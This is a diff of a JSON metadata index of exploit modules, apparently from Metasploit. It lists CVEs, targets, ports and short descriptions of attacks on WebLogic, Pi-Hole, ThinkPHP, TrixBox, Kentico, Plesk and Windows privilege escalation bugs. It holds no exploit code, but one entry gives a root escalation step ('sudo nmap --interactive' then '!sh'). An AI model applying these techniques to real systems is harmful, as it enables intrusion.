+    "disclosure_date": "2020-01-15",
+    "type": "exploit",
+    "author": [
+      "Jang",
+      "Y4er",
+      "Shelby Pace"
+    ],
+    "description": "There exists a Java object deserialization vulnerability\n          in multiple versions of WebLogic.\n\n          Unauthenticated remote code execution can be achieved\n          by sending a serialized BadAttributeValueExpException object\n          over the T3 protocol to vulnerable WebLogic servers.",
+    "references": [
+      "CVE-2020-2555",
+      "URL-https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server",
+      "URL-https://github.com/Y4er/CVE-2020-2555"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "x86, x64",
+    "rport": 7001,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows",
+      "Unix"
+    ],
+    "mod_time": "2020-05-19 14:59:47 +0000",
+    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/weblogic_deserialize_badattrval",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/misc/weblogic_deserialize_marshalledobject": {
     "name": "Oracle Weblogic Server Deserialization RCE - MarshalledObject",
     "fullname": "exploit/multi/misc/weblogic_deserialize_marshalledobject",
@@ -83253,7 +84562,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2020-04-02 11:30:59 +0000",
+    "mod_time": "2020-05-05 19:24:07 +0000",
     "path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
     "is_install_path": true,
     "ref_name": "osx/local/vmware_fusion_lpe",
@@ -84372,6 +85681,46 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/fileformat/metasploit_libnotify_cmd_injection": {
+    "name": "Metasploit Libnotify Plugin Arbitrary Command Execution",
+    "fullname": "exploit/unix/fileformat/metasploit_libnotify_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-04",
+    "type": "exploit",
+    "author": [
+      "pasta <jaguinaga@faradaysec.com>"
+    ],
+    "description": "This module exploits a shell command injection vulnerability in the\n        libnotify plugin. This vulnerability affects Metasploit versions\n        5.0.79 and earlier.",
+    "references": [
+      "CVE-2020-7350",
+      "URL-https://github.com/rapid7/metasploit-framework/issues/13026"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 16:00:56 +0000",
+    "path": "/modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/fileformat/metasploit_libnotify_cmd_injection",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/ftp/proftpd_133c_backdoor": {
     "name": "ProFTPD-1.3.3c Backdoor Command Execution",
     "fullname": "exploit/unix/ftp/proftpd_133c_backdoor",
@@ -85046,6 +86395,127 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/http/pihole_blocklist_exec": {
+    "name": "Pi-Hole heisenbergCompensator Blocklist OS Command Execution",
+    "fullname": "exploit/unix/http/pihole_blocklist_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-05-10",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Nick Frichette"
+    ],
+    "description": "This exploits a command execution in Pi-Hole <= 4.4.  A new blocklist is added, and then an\n          update is forced (gravity) to pull in the blocklist content.  PHP content is then written\n          to a file within the webroot.  Phase 1 writes a sudo pihole command to launch teleporter,\n          effectively running a priv esc.  Phase 2 writes our payload to teleporter.php, overwriting,\n          the content.  Lastly, the phase 1 PHP file is called in the web root, which launches\n          our payload in teleporter.php with root privileges.",
+    "references": [
+      "EDB-48443",
+      "EDB-48442",
+      "URL-https://frichetten.com/blog/cve-2020-11108-pihole-rce/",
+      "URL-https://github.com/frichetten/CVE-2020-11108-PoC",
+      "CVE-2020-11108"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-05-14 15:10:33 +0000",
+    "path": "/modules/exploits/unix/http/pihole_blocklist_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/pihole_blocklist_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": true
+  },
+  "exploit_unix/http/pihole_whitelist_exec": {
+    "name": "Pi-Hole Whitelist OS Command Execution",
+    "fullname": "exploit/unix/http/pihole_whitelist_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-04-15",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Denis Andzakovic"
+    ],
+    "description": "This exploits a command execution vulnerability in Pi-Hole <= 3.3.\n          When adding a new domain to the whitelist, it is possible to chain\n          a command to the domain that is run on the OS.",
+    "references": [
+      "URL-https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-05-14 15:07:10 +0000",
+    "path": "/modules/exploits/unix/http/pihole_whitelist_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/pihole_whitelist_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/http/quest_kace_systems_management_rce": {
     "name": "Quest KACE Systems Management Command Injection",
     "fullname": "exploit/unix/http/quest_kace_systems_management_rce",
@@ -85628,7 +87098,7 @@
     "targets": [
       "OpenSMTPD < 6.6.4 (automatic grammar selection)"
     ],
-    "mod_time": "2020-03-03 16:50:39 +0000",
+    "mod_time": "2020-04-10 02:01:15 +0000",
     "path": "/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb",
     "is_install_path": true,
     "ref_name": "unix/local/opensmtpd_oob_read_lpe",
@@ -86081,7 +87551,7 @@
     "targets": [
       "@(#)version.c       5.51 (Berkeley) 5/2/86"
     ],
-    "mod_time": "2020-02-05 19:13:19 +0000",
+    "mod_time": "2020-04-10 02:01:15 +0000",
     "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
     "is_install_path": true,
     "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -86123,7 +87593,7 @@
     "targets": [
       "OpenSMTPD < 6.6.1"
     ],
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-04-22 10:44:07 +0000",
     "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
     "is_install_path": true,
     "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
@@ -91036,6 +92506,68 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/thinkphp_rce": {
+    "name": "ThinkPHP Multiple PHP Injection RCEs",
+    "fullname": "exploit/unix/webapp/thinkphp_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-12-10",
+    "type": "exploit",
+    "author": [
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits one of two PHP injection vulnerabilities in the\n          ThinkPHP web framework to execute code as the web user.\n\n          Versions up to and including 5.0.23 are exploitable, though 5.0.23 is\n          vulnerable to a separate vulnerability. The module will automatically\n          attempt to detect the version of the software.\n\n          Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.",
+    "references": [
+      "CVE-2018-20062",
+      "CVE-2019-9082",
+      "URL-https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce",
+      "URL-https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-05-20 22:42:20 +0000",
+    "path": "/modules/exploits/unix/webapp/thinkphp_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/thinkphp_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/tikiwiki_graph_formula_exec": {
     "name": "TikiWiki tiki-graph_formula Remote PHP Code Execution",
     "fullname": "exploit/unix/webapp/tikiwiki_graph_formula_exec",
@@ -91240,6 +92772,56 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/trixbox_ce_endpoint_devicemap_rce": {
+    "name": "TrixBox CE endpoint_devicemap.php Authenticated Command Execution",
+    "fullname": "exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-04-28",
+    "type": "exploit",
+    "author": [
+      "Anastasios Stasinopoulos ( <Anastasios Stasinopoulos (@ancst)>"
+    ],
+    "description": "This module exploits an authenticated OS command injection\n          vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4\n          inclusive in the \"network\" POST parameter of the\n          \"/maint/modules/endpointcfg/endpoint_devicemap.php\" page.\n          Successful exploitation allows for arbitrary command execution\n          on the underlying operating system as the \"asterisk\" user.\n          Users can easily elevate their privileges to the \"root\" user\n          however by executing \"sudo nmap --interactive\" followed by \"!sh\"\n          from within nmap.",
+    "references": [
+      "CVE-2020-7351",
+      "URL-https://github.com/rapid7/metasploit-framework/pull/13353"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Linux Dropper)",
+      "Automatic (Unix In-Memory)"
+    ],
+    "mod_time": "2020-04-28 17:25:43 +0000",
+    "path": "/modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/trixbox_ce_endpoint_devicemap_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/trixbox_langchoice": {
     "name": "Trixbox langChoice PHP Local File Inclusion",
     "fullname": "exploit/unix/webapp/trixbox_langchoice",
@@ -92507,7 +94089,7 @@
     "targets": [
       "InfiniteWP Client < 1.9.4.5"
     ],
-    "mod_time": "2020-03-03 13:22:01 +0000",
+    "mod_time": "2020-04-08 00:50:28 +0000",
     "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -92877,7 +94459,7 @@
     "targets": [
       "WordPress 4.6 / Exim"
     ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
     "path": "/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/wp_phpmailer_host_header",
@@ -119002,7 +120584,7 @@
       "mr_me",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a Java deserialization vulnerability in the\n        getChartImage() method from the FileStorage class within ManageEngine\n        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n        \"The short-term fix for the arbitrary file upload vulnerability was\n        released in build 10.0.474 on January 20, 2020. In continuation of that,\n        the complete fix for the remote code execution vulnerability is now\n        available in build 10.0.479.\"",
+    "description": "This module exploits a Java deserialization vulnerability in the\n          getChartImage() method from the FileStorage class within ManageEngine\n          Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n          Quoting the vendor's advisory on fixed versions:\n\n          \"The short-term fix for the arbitrary file upload vulnerability was\n          released in build 10.0.474 on January 20, 2020. In continuation of\n          that, the complete fix for the remote code execution vulnerability is\n          now available in build 10.0.479.\"",
     "references": [
       "CVE-2020-10189",
       "URL-https://srcincite.io/advisories/src-2020-0011/",
@@ -119033,7 +120615,7 @@
       "Windows Dropper",
       "PowerShell Stager"
     ],
-    "mod_time": "2020-03-13 17:36:05 +0000",
+    "mod_time": "2020-05-20 22:42:20 +0000",
     "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb",
     "is_install_path": true,
     "ref_name": "windows/http/desktopcentral_deserialization",
@@ -119041,7 +120623,6 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
-      "PatchedVersion": "100474",
       "Stability": [
         "service-resource-loss"
       ],
@@ -119458,7 +121039,7 @@
       "v9.2.0 - v9.2.1",
       "v9.2.2 - v9.3.0-RC"
     ],
-    "mod_time": "2019-09-11 15:17:06 +0000",
+    "mod_time": "2020-04-14 21:09:17 +0000",
     "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/http/dnn_cookie_deserialization_rce",
@@ -120116,7 +121697,7 @@
     "author": [
       "Spencer McIntyre"
     ],
-    "description": "This module exploits a .NET serialization vulnerability in the\n        Exchange Control Panel (ECP) web page. The vulnerability is due to\n        Microsoft Exchange Server not randomizing the keys on a\n        per-installation basis resulting in them using the same validationKey\n        and decryptionKey values. With knowledge of these, values an attacker\n        can craft a special ViewState to cause an OS command to be executed\n        by NT_AUTHORITY\\SYSTEM using .NET deserialization.",
+    "description": "This module exploits a .NET serialization vulnerability in the\n        Exchange Control Panel (ECP) web page. The vulnerability is due to\n        Microsoft Exchange Server not randomizing the keys on a\n        per-installation basis resulting in them using the same validationKey\n        and decryptionKey values. With knowledge of these values, an attacker\n        can craft a special ViewState to cause an OS command to be executed\n        by NT_AUTHORITY\\SYSTEM using .NET deserialization.",
     "references": [
       "CVE-2020-0688",
       "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
@@ -120144,7 +121725,7 @@
       "Windows (x64)",
       "Windows (cmd)"
     ],
-    "mod_time": "2020-03-12 18:26:01 +0000",
+    "mod_time": "2020-05-20 09:47:11 +0000",
     "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb",
     "is_install_path": true,
     "ref_name": "windows/http/exchange_ecp_viewstate",
@@ -122816,6 +124397,60 @@
     },
     "needs_cleanup": true
   },
+  "exploit_windows/http/kentico_staging_syncserver": {
+    "name": "Kentico CMS Staging SyncServer Unserialize Remote Command Execution",
+    "fullname": "exploit/windows/http/kentico_staging_syncserver",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-15",
+    "type": "exploit",
+    "author": [
+      "Manoj Cherukuri",
+      "Justin LeMay",
+      "aushack <patrick@osisecurity.com.au>"
+    ],
+    "description": "This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.\n        Remote Command Execution is possible via unauthenticated XML requests to the Staging Service\n        SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML\n        input is passed to an insecure .NET deserialize call which allows for remote command execution.",
+    "references": [
+      "CVE-2019-10068",
+      "URL-https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "Windows EXE Dropper",
+      "Windows Command",
+      "Windows Powershell"
+    ],
+    "mod_time": "2020-05-04 10:14:00 +0000",
+    "path": "/modules/exploits/windows/http/kentico_staging_syncserver.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/kentico_staging_syncserver",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/http/kolibri_http": {
     "name": "Kolibri HTTP Server HEAD Buffer Overflow",
     "fullname": "exploit/windows/http/kolibri_http",
@@ -124470,6 +126105,69 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/http/plesk_mylittleadmin_viewstate": {
+    "name": "Plesk/myLittleAdmin ViewState .NET Deserialization",
+    "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-05-15",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a ViewState .NET deserialization vulnerability in\n          web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n          and likely older versions, due to hardcoded <machineKey> parameters in\n          the web.config file for ASP.NET.\n\n          Popular web hosting control panel Plesk offers myLittleAdmin as an\n          optional component that is selected automatically during \"full\"\n          installation. This exploit caters to the Plesk target, though it\n          should work fine against a standalone myLittleAdmin setup.\n\n          Successful exploitation results in code execution as the user running\n          myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n          the \"SQL Admin MSSQL anonymous account.\"\n\n          Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.",
+    "references": [
+      "CVE-2020-13166",
+      "URL-https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/",
+      "URL-https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 8401,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Command",
+      "Windows Dropper",
+      "PowerShell Stager"
+    ],
+    "mod_time": "2020-05-22 16:53:44 +0000",
+    "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/plesk_mylittleadmin_viewstate",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/http/privatewire_gateway": {
     "name": "Private Wire Gateway Buffer Overflow",
     "fullname": "exploit/windows/http/privatewire_gateway",
@@ -125448,7 +127146,7 @@
       "Windows (x64)",
       "Windows (cmd)"
     ],
-    "mod_time": "2020-03-09 11:43:26 +0000",
+    "mod_time": "2020-04-11 13:04:36 +0000",
     "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb",
     "is_install_path": true,
     "ref_name": "windows/http/ssrs_navcorrector_viewstate",
@@ -126681,7 +128379,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-05-20 00:48:26 +0000",
     "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
     "is_install_path": true,
     "ref_name": "windows/iis/ms01_026_dbldecode",
@@ -129303,6 +131001,198 @@
     },
     "needs_cleanup": true
   },
+  "exploit_windows/local/cve_2020_0668_service_tracing": {
+    "name": "Service Tracing Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/cve_2020_0668_service_tracing",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-11",
+    "type": "exploit",
+    "author": [
+      "itm4n",
+      "bwatters-r7"
+    ],
+    "description": "This module leverages a\n                                             trusted file overwrite with\n                                             a dll hijacking\n                                             vulnerability to gain\n                                             SYSTEM-level access on\n                                             vulnerable Windows 10 x64\n                                             targets",
+    "references": [
+      "CVE-2020-0668",
+      "URL-https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/",
+      "URL-https://github.com/itm4n/SysTracingPoc",
+      "URL-https://github.com/RedCursorSecurityConsulting/CVE-2020-0668",
+      "PACKETSTORM-156576",
+      "URL-https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a",
+      "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2020-05-07 09:56:02 +0000",
+    "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2020_0668_service_tracing",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
+  "exploit_windows/local/cve_2020_0796_smbghost": {
+    "name": "SMBv3 Compression Buffer Overflow",
+    "fullname": "exploit/windows/local/cve_2020_0796_smbghost",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2020-03-13",
+    "type": "exploit",
+    "author": [
+      "Daniel García Gutiérrez",
+      "Manuel Blanco Parajón",
+      "Spencer McIntyre"
+    ],
+    "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n            execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n            before injecting a payload into winlogon.exe.",
+    "references": [
+      "CVE-2020-0796",
+      "URL-https://github.com/danigargu/CVE-2020-0796",
+      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 10 v1903-1909 x64"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2020_0796_smbghost",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-os-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
+  "exploit_windows/local/docker_credential_wincred": {
+    "name": "Docker-Credential-Wincred.exe Privilege Escalation",
+    "fullname": "exploit/windows/local/docker_credential_wincred",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2019-07-05",
+    "type": "exploit",
+    "author": [
+      "Morgan Roman",
+      "bwatters-r7"
+    ],
+    "description": "This exploit leverages a vulnerability in docker desktop\n          community editions prior to 2.1.0.1 where an attacker can write\n          a payload to a lower-privileged area to be executed\n          automatically by the docker user at login.",
+    "references": [
+      "CVE-2019-15752",
+      "URL-https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-24 09:56:42 +0000",
+    "path": "/modules/exploits/windows/local/docker_credential_wincred.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/docker_credential_wincred",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
+  "exploit_windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc": {
+    "name": "Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation",
+    "fullname": "exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-25",
+    "type": "exploit",
+    "author": [
+      "Chris Lyne",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Druva inSync client for Windows exposes a network service on TCP port\n            6064 on the local network interface. inSync versions 6.5.2 and prior\n            do not validate user-supplied program paths in RPC type 5 messages,\n            allowing execution of arbitrary commands as SYSTEM.\n            This module has been tested successfully on inSync version\n            6.5.2r99097 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2019-3999",
+      "EDB-48400",
+      "PACKETSTORM-157493",
+      "URL-https://www.tenable.com/security/research/tra-2020-12",
+      "URL-https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-05-06 14:09:46 +0000",
+    "path": "/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/ikeext_service": {
     "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",
     "fullname": "exploit/windows/local/ikeext_service",
@@ -129333,7 +131223,7 @@
       "Windows x86",
       "Windows x64"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-08 14:49:01 +0000",
     "path": "/modules/exploits/windows/local/ikeext_service.rb",
     "is_install_path": true,
     "ref_name": "windows/local/ikeext_service",
@@ -130578,6 +132468,51 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/ntusermndragover": {
+    "name": "Microsoft Windows NtUserMNDragOver Local Privilege Elevation",
+    "fullname": "exploit/windows/local/ntusermndragover",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-03-12",
+    "type": "exploit",
+    "author": [
+      "Clément Lecigne",
+      "Grant Willcox",
+      "timwr"
+    ],
+    "description": "This module exploits a NULL pointer dereference vulnerability in\n               MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n               The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n               function does not effectively check the validity of the tagPOPUPMENU\n               objects it processes before passing them on to MNGetpItemFromIndex(),\n               where the NULL pointer dereference will occur.\n\n               This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n               within the solution may need to be adjusted to work with other versions\n               of Windows, such as Windows Server 2008.",
+    "references": [
+      "CVE-2019-0808",
+      "URL-https://github.com/exodusintel/CVE-2019-0808",
+      "URL-https://github.com/ze0r/cve-2019-0808-poc",
+      "URL-http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html",
+      "URL-https://blog.exodusintel.com/2019/05/17/windows-within-windows/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 7 x86"
+    ],
+    "mod_time": "2020-05-05 21:28:51 +0000",
+    "path": "/modules/exploits/windows/local/ntusermndragover.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ntusermndragover",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/local/nvidia_nvsvc": {
     "name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation",
     "fullname": "exploit/windows/local/nvidia_nvsvc",
@@ -130852,7 +132787,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2020-01-03 20:32:01 +0000",
+    "mod_time": "2020-05-08 14:49:01 +0000",
     "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb",
     "is_install_path": true,
     "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc",
@@ -131375,22 +133310,24 @@
     },
     "needs_cleanup": true
   },
-  "exploit_windows/local/trusted_service_path": {
-    "name": "Windows Service Trusted Path Privilege Escalation",
-    "fullname": "exploit/windows/local/trusted_service_path",
+  "exploit_windows/local/unquoted_service_path": {
+    "name": "Windows Unquoted Service Path Privilege Escalation",
+    "fullname": "exploit/windows/local/unquoted_service_path",
     "aliases": [
-
+      "exploits/windows/local/trusted_service_path"
     ],
     "rank": 600,
     "disclosure_date": "2001-10-25",
     "type": "exploit",
     "author": [
-      "sinn3r <sinn3r@metasploit.com>"
+      "sinn3r <sinn3r@metasploit.com>",
+      "h00die"
     ],
